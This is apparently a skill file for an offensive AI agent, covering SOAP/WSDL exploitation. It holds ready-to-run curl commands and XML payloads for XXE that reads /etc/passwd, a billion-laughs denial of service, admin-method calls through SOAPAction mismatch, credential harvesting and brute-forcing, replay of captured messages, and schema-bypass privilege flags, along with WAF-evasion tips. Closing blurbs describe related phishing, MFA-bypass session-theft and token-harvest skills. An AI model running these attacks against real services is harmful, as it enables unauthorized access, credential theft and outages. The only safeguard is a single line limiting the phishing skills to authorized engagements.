Menu
SOAP / WSDL exploitation — WSDL enumeration via ?wsdl, XXE in SOAP envelope, WS-Addressing replay, WS-Security UsernameToken brute, SAML token injection in WS-Trust, schema validation bypass.
| name | api-soap-wsdl |
| description | SOAP / WSDL exploitation — WSDL enumeration via ?wsdl, XXE in SOAP envelope, WS-Addressing replay, WS-Security UsernameToken brute, SAML token injection in WS-Trust, schema validation bypass. |
| allowed-tools | Bash Read Write |
| metadata | {"when_to_use":"soap wsdl xml ws-security ws-addressing ws-trust saml asmx wcf .asmx .svc spring-ws","subdomain":"api","tags":"soap, wsdl, xml, ws-security","mitre_attack":"T1190, T1203"} |
Legacy enterprise integrations still ship SOAP — payment processors, ERP middleware, government APIs, Java EE bus systems.
# WSDL endpoints — try ?wsdl on any .asmx (.NET) / .svc (WCF) / Spring-WS endpoint
curl -sk "https://target/Service.asmx?wsdl" | xmllint --format -
curl -sk "https://target/Service.svc?wsdl" | xmllint --format -
# Generate a client from the WSDL
python -m zeep https://target/Service.asmx?wsdl
# OR
wsdl2java -uri https://target/Service.asmx?wsdl
curl -sk -X POST -H "Content-Type: text/xml" -H 'SOAPAction: ""' \
-d '<?xml version="1.0"?>
<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body><tns:Method><tns:arg>&x;</tns:arg></tns:Method></soap:Body>
</soap:Envelope>' https://target/Service.asmx
The <wsse:UsernameToken> often carries <wsse:Password> in clear text. If the channel is HTTP (not HTTPS) or the proxy logs payload, harvest creds:
# WSPolicy may demand: Type="...#PasswordText"
curl -sk -X POST -d @ws-attack.xml https://target/svc
# Brute: cycle a username dict, observe response time/error class
SOAP responses often include <wsa:RelatesTo> referencing the request <wsa:MessageID>. Some servers don't validate freshness:
<wsa:MessageID>uuid:CAPTURED_FROM_LEGITIMATE_REQUEST</wsa:MessageID>
WS-Trust 1.3 RST/RSTR flows accept SAML tokens. Re-sign the assertion with the IdP's leaked cert OR exploit XML Signature Wrapping (XSW) — see the SAML skill for full XSW patterns.
Many servers parse the SOAP envelope before validating against the XSD. Inject XML that's malformed-for-schema but valid-for-parser:
<soap:Body>
<tns:Method>
<tns:adminFlag>true</tns:adminFlag> <!-- not in XSD, often honored -->
<tns:arg>value</tns:arg>
</tns:Method>
</soap:Body>
<!DOCTYPE x [<!ENTITY a "12345678"><!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;"><!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">]>
<x>&c;&c;&c;</x>
.NET ASMX picks the method by SOAPAction header, not body. Mismatch → call methods you shouldn't be able to:
curl -X POST -H 'SOAPAction: "http://target/AdminMethod"' \
-d '<soap:Envelope>...PublicMethod body...</soap:Envelope>' \
https://target/Service.asmx
# SoapUI free / Postman SOAP — interactive probing
soapui --gui # or non-GUI: testrunner.sh
# Burp Suite extensions: Wsdler, SAML Raider, XML Signature Wrapping
# python zeep — programmatic SOAP client (good for automation)
python3 -c "from zeep import Client; c = Client('https://target/Service.asmx?wsdl'); print(c.service.Method('arg'))"
<wsa:MessageID> is logged in many WAFs — randomize per-request.Author and deploy an evilginx2 phishlet to reverse-proxy a real login and capture the post-authentication session cookie, defeating MFA via session-token theft.
Build and launch a tracked phishing campaign with the GoPhish REST API — sending profile, groups, email template, landing page, launch, and event polling.
Register and provision a lookalike / Punycode phishing domain with DNS and TLS so GoPhish and evilginx2 lures resolve and pass modern mail + browser checks.
Harvest and replay O365 / Entra ID access via the OAuth device-code flow and captured tokens (TokenTactics-style), skipping the password + MFA prompts.
Design a credible phishing pretext and target shortlist from OSINT before any campaign is built — sender persona, scenario, timing, and the minimal target set.
Phishing / social-engineering catalog for the Phisher agent. Use ONLY when the engagement RoE authorizes a phishing engagement. Covers pretext design, GoPhish campaigns, evilginx2 MFA-bypass proxying, O365 credential/token harvest, lookalike domains, and the mandatory blue-team deconfliction handshake.